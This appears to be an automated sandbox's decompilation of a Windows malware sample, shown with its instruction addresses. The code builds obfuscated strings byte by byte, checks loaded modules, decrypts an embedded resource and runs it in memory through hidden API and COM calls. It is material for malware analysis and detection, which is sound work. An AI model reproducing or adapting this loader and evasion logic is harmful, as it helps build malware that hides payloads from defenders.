                                                                      					if(_t341 == 0) {
                                                                      						L38:
                                                                      						CloseHandle(_t525);
                                                                      						_t526 = GetModuleHandleA(0);
                                                                      						 *((char*)(_t557 + 0x1c)) = 0xfc;
                                                                      						 *((char*)(_t557 + 0x1d)) = 0xb;
                                                                      						 *((char*)(_t557 + 0x1e)) = 0xff;
                                                                      						 *((char*)(_t557 + 0x1f)) = 0x75;
                                                                      						 *((char*)(_t557 + 0x20)) = 0xe7;
                                                                      						 *((char*)(_t557 + 0x21)) = 0x44;
                                                                      						 *((char*)(_t557 + 0x22)) = 0x4b;
                                                                      						 *((char*)(_t557 + 0x23)) = 0x23;
                                                                      						 *((char*)(_t557 + 0x24)) = 0xbf;
                                                                      						 *((char*)(_t557 + 0x25)) = 0x45;
                                                                      						 *((char*)(_t557 + 0x26)) = 0x3b;
                                                                      						 *((char*)(_t557 + 0x27)) = 0x56;
                                                                      						 *((char*)(_t557 + 0x28)) = 0xf8;
                                                                      						 *((char*)(_t557 + 0x29)) = 0x98;
                                                                      						 *((char*)(_t557 + 0x2a)) = 0x5b;
                                                                      						 *((char*)(_t557 + 0x2b)) = 0xf4;
                                                                      						 *((char*)(_t557 + 0x2c)) = 0xb5;
                                                                      						 *((char*)(_t557 + 0x2d)) = 0x87;
                                                                      						 *((char*)(_t557 + 0x2e)) = 0x7b;
                                                                      						 *((char*)(_t557 + 0x2f)) = 0xf;
                                                                      						 *((char*)(_t557 + 0x30)) = 0xf4;
                                                                      						 *((char*)(_t557 + 0x31)) = 0x76;
                                                                      						 *((char*)(_t557 + 0x32)) = 0xb9;
                                                                      						 *((char*)(_t557 + 0x33)) = 0x34;
                                                                      						 *((char*)(_t557 + 0x34)) = 0xbf;
                                                                      						 *((char*)(_t557 + 0x35)) = 0x1e;
                                                                      						 *((char*)(_t557 + 0x36)) = 0xe7;
                                                                      						 *((char*)(_t557 + 0x37)) = 0x78;
                                                                      						 *((char*)(_t557 + 0x38)) = 0x98;
                                                                      						 *((char*)(_t557 + 0x39)) = 0xe9;
                                                                      						 *((char*)(_t557 + 0x3a)) = 0x6f;
                                                                      						 *((char*)(_t557 + 0x3b)) = 0xb4;
                                                                      						 *((char*)(_t557 + 0x3c)) = 0;
                                                                      						_t344 = E00401650(_t557 + 0x18, _t557 + 0x158);
                                                                      						_t558 = _t557 + 8;
                                                                      						_t536 = FindResourceA(_t526, _t344, 0xa);
                                                                      						 *(_t558 + 0x50) = _t536;
                                                                      						_t551 = LoadResource(_t526, _t536);
                                                                      						 *((intOrPtr*)(_t558 + 0x44)) = LockResource(_t551);
                                                                      						_t349 = E0040B84D(0, _t557 + 0x18, _t526, SizeofResource(_t526, _t536)); // executed
                                                                      						_push(0x40022);
                                                                      						_t537 = _t349; // executed
                                                                      						_t350 = E0040AF66(0, _t526, __eflags); // executed
                                                                      						_t559 = _t558 + 8;
                                                                      						 *(_t559 + 0x34) = _t350;
                                                                      						__eflags = _t350;
                                                                      						if(_t350 == 0) {
                                                                      							 *(_t559 + 0x50) = 0;
                                                                      						} else {
                                                                      							E0040BA30(_t526, _t350, 0, 0x40022);
                                                                      							_t486 =  *(_t559 + 0x40);
                                                                      							_t559 = _t559 + 0xc;
                                                                      							 *(_t559 + 0x50) = _t486;
                                                                      						}
                                                                      						E00401300( *(_t559 + 0x50));
                                                                      						_t497 =  *(_t559 + 0x48);
                                                                      						_t352 = SizeofResource(_t526, _t497);
                                                                      						 *(_t559 + 0x40) = _t352;
                                                                      						asm("cdq");
                                                                      						_t354 = _t352 + (_t497 & 0x000003ff) >> 0xa;
                                                                      						__eflags = _t354;
                                                                      						if(_t354 > 0) {
                                                                      							_t519 =  *(_t559 + 0x3c);
                                                                      							_t482 = _t537 - _t519;
                                                                      							__eflags = _t482;
                                                                      							 *(_t559 + 0x34) = _t519;
                                                                      							 *(_t559 + 0x88) = _t482;
                                                                      							 *(_t559 + 0x38) = _t354;
                                                                      							do {
                                                                      								_t424 =  *(_t559 + 0x34);
                                                                      								_push( *(_t559 + 0x88) + _t424);
                                                                      								_push(0x400);
                                                                      								_push(_t424);
                                                                      								E00401560(0,  *((intOrPtr*)(_t559 + 0x54)));
                                                                      								 *(_t559 + 0x34) =  *(_t559 + 0x34) + 0x400;
                                                                      								_t179 = _t559 + 0x38;
                                                                      								 *_t179 =  *(_t559 + 0x38) - 1;
                                                                      								__eflags =  *_t179;
                                                                      							} while ( *_t179 != 0);
                                                                      						}
                                                                      						_t448 =  *(_t559 + 0x40) & 0x800003ff;
                                                                      						__eflags = _t448;
                                                                      						if(_t448 < 0) {
                                                                      							_t448 = (_t448 - 0x00000001 | 0xfffffc00) + 1;
                                                                      							__eflags = _t448;
                                                                      						}
                                                                      						__eflags = _t448;
                                                                      						if(_t448 > 0) {
                                                                      							_t421 =  *(_t559 + 0x40) - _t448;
                                                                      							_push(_t421 + _t537);
                                                                      							_push(_t448);
                                                                      							_t422 = _t421 +  *((intOrPtr*)(_t559 + 0x44));
                                                                      							__eflags = _t422;
                                                                      							_push(_t422);
                                                                      							E00401560(0,  *((intOrPtr*)(_t559 + 0x58)));
                                                                      						}
                                                                      						E0040BA30(_t526,  *(_t559 + 0x3c), 0,  *(_t559 + 0x40));
                                                                      						_t560 = _t559 + 0xc;
                                                                      						FreeResource(_t551);
                                                                      						_t552 =  *_t537;
                                                                      						 *((intOrPtr*)(_t560 + 0x94)) = _t552;
                                                                      						_t358 = E0040B84D(0,  *(_t559 + 0x40), _t526, _t552); // executed
                                                                      						_t561 = _t560 + 4;
                                                                      						 *((intOrPtr*)(_t561 + 0x40)) = _t358;
                                                                      						_t359 = SizeofResource(_t526,  *(_t560 + 0x4c));
                                                                      						_t527 =  *((intOrPtr*)(_t561 + 0x38));
                                                                      						_t192 = _t537 + 4; // 0x4
                                                                      						E0040AC60(_t527, _t561 + 0x98, _t192, _t359);
                                                                      						E0040BA30(_t527, _t537, 0,  *((intOrPtr*)(_t561 + 0x50)));
                                                                      						_t528 = _t527 + 0xe;
                                                                      						 *((char*)(_t561 + 0x34)) = 0xce;
                                                                      						 *((char*)(_t561 + 0x35)) = 0x27;
                                                                      						 *((char*)(_t561 + 0x36)) = 0x9c;
                                                                      						 *((char*)(_t561 + 0x37)) = 0x1a;
                                                                      						 *((char*)(_t561 + 0x38)) = 0x95;
                                                                      						 *((char*)(_t561 + 0x39)) = 0x21;
                                                                      						 *((char*)(_t561 + 0x3a)) = 0x2e;
                                                                      						 *((char*)(_t561 + 0x3b)) = 0xd;
                                                                      						 *((char*)(_t561 + 0x3c)) = 0xdb;
                                                                      						 *((char*)(_t561 + 0x3d)) = 0x29;
                                                                      						 *((char*)(_t561 + 0x3e)) = 0x57;
                                                                      						 *((char*)(_t561 + 0x3f)) = 0x56;
                                                                      						 *((char*)(_t561 + 0x40)) = 0xf8;
                                                                      						 *((char*)(_t561 + 0x41)) = 0x98;
                                                                      						 *((char*)(_t561 + 0x42)) = 0x5b;
                                                                      						 *((char*)(_t561 + 0x43)) = 0xf4;
                                                                      						 *((char*)(_t561 + 0x44)) = 0xb5;
                                                                      						 *((char*)(_t561 + 0x45)) = 0x87;
                                                                      						 *((char*)(_t561 + 0x46)) = 0x7b;
                                                                      						 *((char*)(_t561 + 0x47)) = 0xf;
                                                                      						 *((char*)(_t561 + 0x48)) = 0xf4;
                                                                      						 *((char*)(_t561 + 0x49)) = 0x76;
                                                                      						 *((char*)(_t561 + 0x4a)) = 0xb9;
                                                                      						 *((char*)(_t561 + 0x4b)) = 0x34;
                                                                      						 *((char*)(_t561 + 0x4c)) = 0xbf;
                                                                      						 *((char*)(_t561 + 0x4d)) = 0x1e;
                                                                      						 *((char*)(_t561 + 0x4e)) = 0xe7;
                                                                      						 *((char*)(_t561 + 0x4f)) = 0x78;
                                                                      						 *((char*)(_t561 + 0x50)) = 0x98;
                                                                      						 *((char*)(_t561 + 0x51)) = 0xe9;
                                                                      						 *((char*)(_t561 + 0x52)) = 0x6f;
                                                                      						 *((char*)(_t561 + 0x53)) = 0xb4;
                                                                      						 *((char*)(_t561 + 0x54)) = 0;
                                                                      						_t364 = E00401650(_t561 + 0x30, _t561 + 0x110);
                                                                      						_t562 = _t561 + 0x24;
                                                                      						_t365 = LoadLibraryA(_t364); // executed
                                                                      						_t538 = _t365;
                                                                      						 *((char*)(_t562 + 0x10)) = 0xe0;
                                                                      						 *((char*)(_t562 + 0x11)) = 0x18;
                                                                      						 *((char*)(_t562 + 0x12)) = 0xad;
                                                                      						 *((char*)(_t562 + 0x13)) = 0x36;
                                                                      						 *((char*)(_t562 + 0x14)) = 0x95;
                                                                      						 *((char*)(_t562 + 0x15)) = 0x21;
                                                                      						_t451 = _t562 + 0x134;
                                                                      						 *((char*)(_t562 + 0x1e)) = 0x2a;
                                                                      						 *((char*)(_t562 + 0x1f)) = 0x57;
                                                                      						 *((char*)(_t562 + 0x20)) = 0xda;
                                                                      						 *((char*)(_t562 + 0x21)) = 0xc;
                                                                      						 *((char*)(_t562 + 0x22)) = 0x55;
                                                                      						 *((char*)(_t562 + 0x23)) = 0x25;
                                                                      						 *((char*)(_t562 + 0x24)) = 0x8c;
                                                                      						 *((char*)(_t562 + 0x25)) = 0xf9;
                                                                      						 *((char*)(_t562 + 0x26)) = 0x35;
                                                                      						 *((char*)(_t562 + 0x27)) = 0x97;
                                                                      						 *((char*)(_t562 + 0x28)) = 0xd0;
                                                                      						 *((char*)(_t562 + 0x29)) = 0x87;
                                                                      						 *((char*)(_t562 + 0x2a)) = 0x7b;
                                                                      						 *((char*)(_t562 + 0x2b)) = 0xf;
                                                                      						 *((char*)(_t562 + 0x2c)) = 0xf4;
                                                                      						 *((char*)(_t562 + 0x2d)) = 0x76;
                                                                      						 *((char*)(_t562 + 0x2e)) = 0xb9;
                                                                      						 *((char*)(_t562 + 0x2f)) = 0x34;
                                                                      						 *((char*)(_t562 + 0x30)) = 0xbf;
                                                                      						 *((char*)(_t562 + 0x31)) = 0x1e;
                                                                      						 *((char*)(_t562 + 0x32)) = 0xe7;
                                                                      						 *((char*)(_t562 + 0x33)) = 0x78;
                                                                      						 *((char*)(_t562 + 0x34)) = 0x98;
                                                                      						 *((char*)(_t562 + 0x35)) = 0xe9;
                                                                      						 *((char*)(_t562 + 0x36)) = 0x6f;
                                                                      						 *((char*)(_t562 + 0x37)) = 0xb4;
                                                                      						 *((char*)(_t562 + 0x38)) = 0;
                                                                      						_t366 = E00401650(_t562 + 0x14, _t451);
                                                                      						_t563 = _t562 + 8;
                                                                      						_t367 = GetProcAddress(_t365, _t366);
                                                                      						__eflags = _t367;
                                                                      						_t452 = _t451 & 0xffffff00 | _t367 != 0x00000000;
                                                                      						__eflags = _t452;
                                                                      						 *(_t563 + 0x47) = _t452 == 0;
                                                                      						 *0x423480 = _t367;
                                                                      						 *((intOrPtr*)(_t563 + 0x80)) = 0;
                                                                      						 *((intOrPtr*)(_t563 + 0x84)) = 0;
                                                                      						 *((intOrPtr*)(_t563 + 0x4c)) = 0;
                                                                      						 *(_t563 + 0x58) = 0;
                                                                      						 *(_t563 + 0x54) = 0;
                                                                      						__eflags = _t452;
                                                                      						if(_t452 != 0) {
                                                                      							_t368 =  *_t367(0x41b230, 0x41b220, _t563 + 0x80); // executed
                                                                      							__eflags = _t368;
                                                                      							if(_t368 >= 0) {
                                                                      								__eflags =  *(_t563 + 0x47);
                                                                      								if( *(_t563 + 0x47) == 0) {
                                                                      									 *((intOrPtr*)(_t563 + 0x17c)) = _t563 + 0x17c;
                                                                      									E004018F0( *((intOrPtr*)(_t563 + 0x38)), _t563 + 0x17c, _t563 + 0x17c,  *((intOrPtr*)(_t563 + 0x38)), 3);
                                                                      									_t376 =  *((intOrPtr*)(_t563 + 0x80));
                                                                      									_t378 =  *((intOrPtr*)( *((intOrPtr*)( *_t376 + 0xc))))(_t376,  *((intOrPtr*)(_t563 + 0x178)), 0x41b240, _t563 + 0x84); // executed
                                                                      									__eflags = _t378;
                                                                      									if(_t378 >= 0) {
                                                                      										_t381 =  *((intOrPtr*)(_t563 + 0x84));
                                                                      										_t383 =  *((intOrPtr*)( *((intOrPtr*)( *_t381 + 0x24))))(_t381, 0x41b210, 0x41b290, _t563 + 0x4c); // executed
                                                                      										__eflags = _t383;
                                                                      										if(_t383 >= 0) {
                                                                      											_t384 =  *((intOrPtr*)(_t563 + 0x4c));
                                                                      											_t385 =  *((intOrPtr*)( *((intOrPtr*)( *_t384 + 0x28))))(_t384); // executed
                                                                      											__eflags = _t385;
                                                                      											if(_t385 >= 0) {
                                                                      												 *((intOrPtr*)(_t563 + 0x38)) = 0;
                                                                      												E00401870(_t563 + 0x44, _t552, "_._");
                                                                      												_t539 = __imp__#8;
                                                                      												 *((intOrPtr*)(_t563 + 0x40)) = 0;
                                                                      												 *_t539(_t563 + 0x94);
                                                                      												E00401870(_t563 + 0x3c, _t552, "___");
                                                                      												 *_t539(_t563 + 0xa4);
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t563 + 0x4c)))) + 0x34))))( *((intOrPtr*)(_t563 + 0x50)), E004018D0(_t563 + 0x58)); // executed
                                                                      												_t542 =  *(_t563 + 0x58);
                                                                      												__eflags = _t542;
                                                                      												if(_t542 == 0) {
                                                                      													E0040AD90(0x80004003);
                                                                      												}
                                                                      												_t396 =  *((intOrPtr*)( *((intOrPtr*)( *_t542))))(_t542, 0x41b270, E004018D0(_t563 + 0x54));
                                                                      												 *((intOrPtr*)(_t563 + 0x94)) = _t552 + 0xfffffff2;
                                                                      												 *((intOrPtr*)(_t563 + 0x98)) = 0;
                                                                      												__imp__#15(0x11, 1, _t563 + 0x88); // executed
                                                                      												_t543 = _t396;
                                                                      												 *((intOrPtr*)(_t563 + 0x50)) = 0;
                                                                      												__imp__#23(_t543, _t563 + 0x48);
                                                                      												E0040B350(0, _t528, _t543,  *((intOrPtr*)(_t563 + 0x48)), _t528, _t552 + 0xfffffff2);
                                                                      												_t564 = _t563 + 0xc;
                                                                      												__imp__#24(_t543);
                                                                      												_t399 =  *(_t564 + 0x54);
                                                                      												__eflags = _t399;
                                                                      												if(_t399 == 0) {
                                                                      													_t399 = E0040AD90(0x80004003);
                                                                      												}
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t399 + 0xb4))))(_t399, _t543, E004018D0(_t564 + 0x34)); // executed
                                                                      												__eflags = _t543;
                                                                      												if(_t543 != 0) {
                                                                      													__imp__#16(_t543); // executed
                                                                      												}
                                                                      												_t402 =  *(_t564 + 0x34);
                                                                      												__eflags = _t402;
                                                                      												if(_t402 == 0) {
                                                                      													_t402 = E0040AD90(0x80004003);
                                                                      												}
                                                                      												_t469 =  *(_t564 + 0x40);
                                                                      												_t555 = _t402;
                                                                      												__eflags = _t469;
                                                                      												if(_t469 == 0) {
                                                                      													_t531 = 0;
                                                                      													__eflags = 0;
                                                                      												} else {
                                                                      													_t531 =  *_t469;
                                                                      												}
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t402 + 0x44))))(_t555, _t531, E004018D0(_t564 + 0x3c)); // executed
                                                                      												__imp__#411(0xc, 0, 0);
                                                                      												_t471 =  *(_t564 + 0x3c);
                                                                      												__eflags = _t471;
                                                                      												if(_t471 == 0) {
                                                                      													E0040AD90(0x80004003);
                                                                      												}
                                                                      												_t405 =  *(_t564 + 0x38);
                                                                      												__eflags = _t405;
                                                                      												if(_t405 == 0) {
                                                                      													_t514 = 0;
                                                                      													__eflags = 0;
                                                                      												} else {
                                                                      													_t514 =  *_t405;
                                                                      												}
                                                                      												_t563 = _t564 - 0x10;
                                                                      												_t407 = _t563;
                                                                      												 *_t407 =  *((intOrPtr*)(_t564 + 0x94));
                                                                      												 *((intOrPtr*)(_t407 + 4)) =  *((intOrPtr*)(_t563 + 0xb0));
                                                                      												 *((intOrPtr*)(_t407 + 8)) =  *((intOrPtr*)(_t563 + 0xb8));
                                                                      												_t528 =  *((intOrPtr*)(_t563 + 0xc0));
                                                                      												 *((intOrPtr*)(_t407 + 0xc)) =  *((intOrPtr*)(_t563 + 0xc0));
                                                                      												 *((intOrPtr*)( *((intOrPtr*)( *_t471 + 0xe4))))(_t471, _t514, 0x118, 0, 0, _t564 + 0xa4);
                                                                      												_t538 = __imp__#9; // 0x742dcf00
                                                                      												_t538->i(_t563 + 0xa4);
                                                                      												E004019A0(_t563 + 0x38);
                                                                      												_t538->i(_t563 + 0x94);
                                                                      												_t413 =  *(_t563 + 0x3c);
                                                                      												__eflags = _t413;
                                                                      												if(_t413 != 0) {
                                                                      													 *((intOrPtr*)( *((intOrPtr*)( *_t413 + 8))))(_t413);
                                                                      												}
                                                                      												E004019A0(_t563 + 0x40);
                                                                      												_t415 =  *(_t563 + 0x34);
                                                                      												__eflags = _t415;
                                                                      												if(_t415 != 0) {
                                                                      													 *((intOrPtr*)( *((intOrPtr*)( *_t415 + 8))))(_t415);
                                                                      												}
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									_t379 =  *((intOrPtr*)(_t563 + 0x174));
                                                                      									__eflags = _t379 - _t563 + 0x178;
                                                                      									if(__eflags != 0) {
                                                                      										_push(_t379);
                                                                      										E0040B6B5(0, _t528, _t538, __eflags);
                                                                      										_t563 = _t563 + 4;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							_t369 =  *(_t563 + 0x54);
                                                                      							__eflags = _t369;
                                                                      							if(_t369 != 0) {
                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t369 + 8))))(_t369);
                                                                      							}
                                                                      							_t370 =  *(_t563 + 0x58);
                                                                      							__eflags = _t370;
                                                                      							if(_t370 != 0) {
                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t370 + 8))))(_t370);
                                                                      							}
                                                                      						}
                                                                      						goto L80;
                                                                      					} else {
                                                                      						_t428 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                      						_t565 = _t557 + 8;
                                                                      						_t547 = _t428;
                                                                      						_t520 = _t565 + 0x298;
                                                                      						while(1) {
                                                                      							_t429 =  *_t520;
                                                                      							if(_t429 !=  *_t547) {
                                                                      								break;
                                                                      							}
                                                                      							if(_t429 == 0) {
                                                                      								L7:
                                                                      								_t429 = 0;
                                                                      							} else {
                                                                      								_t493 =  *((intOrPtr*)(_t520 + 1));
                                                                      								if(_t493 !=  *((intOrPtr*)(_t547 + 1))) {
                                                                      									break;
                                                                      								} else {
                                                                      									_t520 = _t520 + 2;
                                                                      									_t547 = _t547 + 2;
                                                                      									if(_t493 != 0) {
                                                                      										continue;
                                                                      									} else {
                                                                      										goto L7;
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      							L9:
                                                                      							if(_t429 != 0) {
                                                                      								_t431 = E00401650(_t565 + 0x14, _t565 + 0xb4);
                                                                      								_t557 = _t565 + 8;
                                                                      								_t548 = _t431;
                                                                      								_t488 = _t557 + 0x298;
                                                                      								while(1) {
                                                                      									_t432 =  *_t488;
                                                                      									__eflags = _t432 -  *_t548;
                                                                      									if(_t432 !=  *_t548) {
                                                                      										break;
                                                                      									}
                                                                      									__eflags = _t432;
                                                                      									if(_t432 == 0) {
                                                                      										L16:
                                                                      										_t432 = 0;
                                                                      									} else {
                                                                      										_t432 =  *((intOrPtr*)(_t488 + 1));
                                                                      										__eflags = _t432 -  *((intOrPtr*)(_t548 + 1));
                                                                      										if(_t432 !=  *((intOrPtr*)(_t548 + 1))) {
                                                                      											break;
                                                                      										} else {
                                                                      											_t488 = _t488 + 2;
                                                                      											_t548 = _t548 + 2;
                                                                      											__eflags = _t432;
                                                                      											if(_t432 != 0) {
                                                                      												continue;
                                                                      											} else {
                                                                      												goto L16;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      									L18:
                                                                      									__eflags = _t432;
                                                                      									if(_t432 == 0) {
                                                                      										goto L10;
                                                                      									} else {
                                                                      										_t435 = Module32Next(_t525, _t557 + 0x278);
                                                                      										__eflags = _t435;
                                                                      										if(_t435 != 0) {
                                                                      											do {
                                                                      												_t437 = E00401650(_t557 + 0x60, _t557 + 0xd4);
                                                                      												_t566 = _t557 + 8;
                                                                      												_t549 = _t437;
                                                                      												_t490 = _t566 + 0x298;
                                                                      												while(1) {
                                                                      													_t438 =  *_t490;
                                                                      													__eflags = _t438 -  *_t549;
                                                                      													if(_t438 !=  *_t549) {
                                                                      														break;
                                                                      													}
                                                                      													__eflags = _t438;
                                                                      													if(_t438 == 0) {
                                                                      														L26:
                                                                      														_t438 = 0;
                                                                      													} else {
                                                                      														_t438 =  *((intOrPtr*)(_t490 + 1));
                                                                      														__eflags = _t438 -  *((intOrPtr*)(_t549 + 1));
                                                                      														if(_t438 !=  *((intOrPtr*)(_t549 + 1))) {
                                                                      															break;
                                                                      														} else {
                                                                      															_t490 = _t490 + 2;
                                                                      															_t549 = _t549 + 2;
                                                                      															__eflags = _t438;
                                                                      															if(_t438 != 0) {
                                                                      																continue;
                                                                      															} else {
                                                                      																goto L26;
                                                                      															}
                                                                      														}
                                                                      													}
                                                                      													L28:
                                                                      													__eflags = _t438;
                                                                      													if(_t438 == 0) {
                                                                      														goto L10;
                                                                      													} else {
                                                                      														_t439 = E00401650(_t566 + 0x14, _t566 + 0xb4);
                                                                      														_t557 = _t566 + 8;
                                                                      														_t550 = _t439;
                                                                      														_t492 = _t557 + 0x298;
                                                                      														while(1) {
                                                                      															_t440 =  *_t492;
                                                                      															__eflags = _t440 -  *_t550;
                                                                      															if(_t440 !=  *_t550) {
                                                                      																break;
                                                                      															}
                                                                      															__eflags = _t440;
                                                                      															if(_t440 == 0) {
                                                                      																L34:
                                                                      																_t440 = 0;
                                                                      															} else {
                                                                      																_t440 =  *((intOrPtr*)(_t492 + 1));
                                                                      																__eflags = _t440 -  *((intOrPtr*)(_t550 + 1));
                                                                      																if(_t440 !=  *((intOrPtr*)(_t550 + 1))) {
                                                                      																	break;
                                                                      																} else {
                                                                      																	_t492 = _t492 + 2;
                                                                      																	_t550 = _t550 + 2;
                                                                      																	__eflags = _t440;
                                                                      																	if(_t440 != 0) {
                                                                      																		continue;
                                                                      																	} else {
                                                                      																		goto L34;
                                                                      																	}
                                                                      																}
                                                                      															}
                                                                      															L36:
                                                                      															__eflags = _t440;
                                                                      															if(_t440 == 0) {
                                                                      																goto L10;
                                                                      															} else {
                                                                      																goto L37;
                                                                      															}
                                                                      															goto L81;
                                                                      														}
                                                                      														asm("sbb eax, eax");
                                                                      														asm("sbb eax, 0xffffffff");
                                                                      														goto L36;
                                                                      													}
                                                                      													goto L81;
                                                                      												}
                                                                      												asm("sbb eax, eax");
                                                                      												asm("sbb eax, 0xffffffff");
                                                                      												goto L28;
                                                                      												L37:
                                                                      												_t442 = Module32Next(_t525, _t557 + 0x278);
                                                                      												__eflags = _t442;
                                                                      											} while (_t442 != 0);
                                                                      										}
                                                                      										goto L38;
                                                                      									}
                                                                      									goto L81;
                                                                      								}
                                                                      								asm("sbb eax, eax");
                                                                      								asm("sbb eax, 0xffffffff");
                                                                      								goto L18;
                                                                      							} else {
                                                                      								L10:
                                                                      								CloseHandle(_t525);
                                                                      								return 0;
                                                                      							}
                                                                      							goto L81;
                                                                      						}
                                                                      						asm("sbb eax, eax");
                                                                      						asm("sbb eax, 0xffffffff");
                                                                      						goto L9;
                                                                      					}
                                                                      				}
                                                                      				L81:
                                                                      			}

                                                                      0x00402079
                                                                      0x0040207e
                                                                      0x00402083
                                                                      0x00402088
                                                                      0x0040208d
                                                                      0x00402092
                                                                      0x00402097
                                                                      0x0040209c
                                                                      0x004020a1
                                                                      0x004020a5
                                                                      0x004020aa
                                                                      0x004020ae
                                                                      0x004020b4
                                                                      0x004020b6
                                                                      0x004020bb
                                                                      0x004020c0
                                                                      0x004020c5
                                                                      0x004020ca
                                                                      0x004020cf
                                                                      0x004020d4
                                                                      0x004020e1
                                                                      0x004020e6
                                                                      0x004020eb
                                                                      0x004020f0
                                                                      0x004020f5
                                                                      0x004020fa
                                                                      0x004020ff
                                                                      0x00402104
                                                                      0x00402109
                                                                      0x0040210e
                                                                      0x00402113
                                                                      0x00402118
                                                                      0x0040211d
                                                                      0x00402122
                                                                      0x00402127
                                                                      0x0040212c
                                                                      0x00402131
                                                                      0x00402136
                                                                      0x0040213b
                                                                      0x00402140
                                                                      0x00402145
                                                                      0x0040214a
                                                                      0x0040214f
                                                                      0x00402154
                                                                      0x00402159
                                                                      0x0040215e
                                                                      0x00402163
                                                                      0x00402167
                                                                      0x0040216c
                                                                      0x00402171
                                                                      0x00402177
                                                                      0x00402179
                                                                      0x0040217c
                                                                      0x0040217e
                                                                      0x00402183
                                                                      0x00402188
                                                                      0x0040218f
                                                                      0x00402196
                                                                      0x0040219a
                                                                      0x0040219e
                                                                      0x004021a2
                                                                      0x004021a4
                                                                      0x004021bc
                                                                      0x004021be
                                                                      0x004021c0
                                                                      0x004021c6
                                                                      0x004021ca
                                                                      0x004021e5
                                                                      0x004021ec
                                                                      0x004021f1
                                                                      0x00402213
                                                                      0x00402215
                                                                      0x00402217
                                                                      0x0040221d
                                                                      0x00402239
                                                                      0x0040223b
                                                                      0x0040223d
                                                                      0x00402243
                                                                      0x0040224d
                                                                      0x0040224f
                                                                      0x00402251
                                                                      0x00402260
                                                                      0x00402264
                                                                      0x00402269
                                                                      0x00402277
                                                                      0x0040227b
                                                                      0x00402286
                                                                      0x00402293
                                                                      0x004022af
                                                                      0x004022b1
                                                                      0x004022b5
                                                                      0x004022b7
                                                                      0x004022be
                                                                      0x004022be
                                                                      0x004022d7
                                                                      0x004022e8
                                                                      0x004022ef
                                                                      0x004022f6
                                                                      0x00402300
                                                                      0x00402304
                                                                      0x00402308
                                                                      0x00402315
                                                                      0x0040231a
                                                                      0x0040231e
                                                                      0x00402324
                                                                      0x00402328
                                                                      0x0040232a
                                                                      0x00402331
                                                                      0x00402331
                                                                      0x0040234e
                                                                      0x00402350
                                                                      0x00402352
                                                                      0x00402355
                                                                      0x00402355
                                                                      0x0040235b
                                                                      0x0040235f
                                                                      0x00402361
                                                                      0x00402368
                                                                      0x00402368
                                                                      0x0040236d
                                                                      0x00402371
                                                                      0x00402373
                                                                      0x00402375
                                                                      0x0040237b
                                                                      0x0040237b
                                                                      0x00402377
                                                                      0x00402377
                                                                      0x00402377
                                                                      0x00402390
                                                                      0x00402396
                                                                      0x0040239c
                                                                      0x004023a0
                                                                      0x004023a2
                                                                      0x004023a9
                                                                      0x004023a9
                                                                      0x004023ae
                                                                      0x004023b2
                                                                      0x004023b4
                                                                      0x004023ba
                                                                      0x004023ba
                                                                      0x004023b6
                                                                      0x004023b6
                                                                      0x004023b6
                                                                      0x004023ce
                                                                      0x004023d1
                                                                      0x004023d3
                                                                      0x004023dd
                                                                      0x004023ec
                                                                      0x004023ef
                                                                      0x004023fe
                                                                      0x00402401
                                                                      0x00402403
                                                                      0x00402411
                                                                      0x00402417
                                                                      0x00402424
                                                                      0x00402426
                                                                      0x0040242a
                                                                      0x0040242c
                                                                      0x00402434
                                                                      0x00402434
                                                                      0x0040243a
                                                                      0x0040243f
                                                                      0x00402443
                                                                      0x00402445
                                                                      0x0040244d
                                                                      0x0040244d
                                                                      0x00402445
                                                                      0x00402251
                                                                      0x0040223d
                                                                      0x0040244f
                                                                      0x0040245d
                                                                      0x0040245f
                                                                      0x00402461
                                                                      0x00402462
                                                                      0x00402467
                                                                      0x00402467
                                                                      0x0040245f
                                                                      0x004021ca
                                                                      0x0040246a
                                                                      0x0040246e
                                                                      0x00402470
                                                                      0x00402478
                                                                      0x00402478
                                                                      0x0040247a
                                                                      0x0040247e
                                                                      0x00402480
                                                                      0x00402488
                                                                      0x00402488
                                                                      0x00402480
                                                                      0x00000000
                                                                      0x00401c55
                                                                      0x00401c62
                                                                      0x00401c67
                                                                      0x00401c6a
                                                                      0x00401c6c
                                                                      0x00401c73
                                                                      0x00401c73
                                                                      0x00401c77
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401c7b
                                                                      0x00401c8f
                                                                      0x00401c8f
                                                                      0x00401c7d
                                                                      0x00401c7d
                                                                      0x00401c83
                                                                      0x00000000
                                                                      0x00401c85
                                                                      0x00401c85
                                                                      0x00401c88
                                                                      0x00401c8d
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401c8d
                                                                      0x00401c83
                                                                      0x00401c98
                                                                      0x00401c9a
                                                                      0x00401cbd
                                                                      0x00401cc2
                                                                      0x00401cc5
                                                                      0x00401cc7
                                                                      0x00401cd0
                                                                      0x00401cd0
                                                                      0x00401cd2
                                                                      0x00401cd4
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401cd6
                                                                      0x00401cd8
                                                                      0x00401cec
                                                                      0x00401cec
                                                                      0x00401cda
                                                                      0x00401cda
                                                                      0x00401cdd
                                                                      0x00401ce0
                                                                      0x00000000
                                                                      0x00401ce2
                                                                      0x00401ce2
                                                                      0x00401ce5
                                                                      0x00401ce8
                                                                      0x00401cea
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401cea
                                                                      0x00401ce0
                                                                      0x00401cf5
                                                                      0x00401cf5
                                                                      0x00401cf7
                                                                      0x00000000
                                                                      0x00401cf9
                                                                      0x00401d02
                                                                      0x00401d07
                                                                      0x00401d09
                                                                      0x00401d10
                                                                      0x00401d1d
                                                                      0x00401d22
                                                                      0x00401d25
                                                                      0x00401d27
                                                                      0x00401d30
                                                                      0x00401d30
                                                                      0x00401d32
                                                                      0x00401d34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00401d36
                                                                      0x00401d38
                                                                      0x00401d4c
                                                                      0x00401d4c
                                                                      0x00401d3a
                                                                      0x00401d3a
                                                                      0x00401d3d
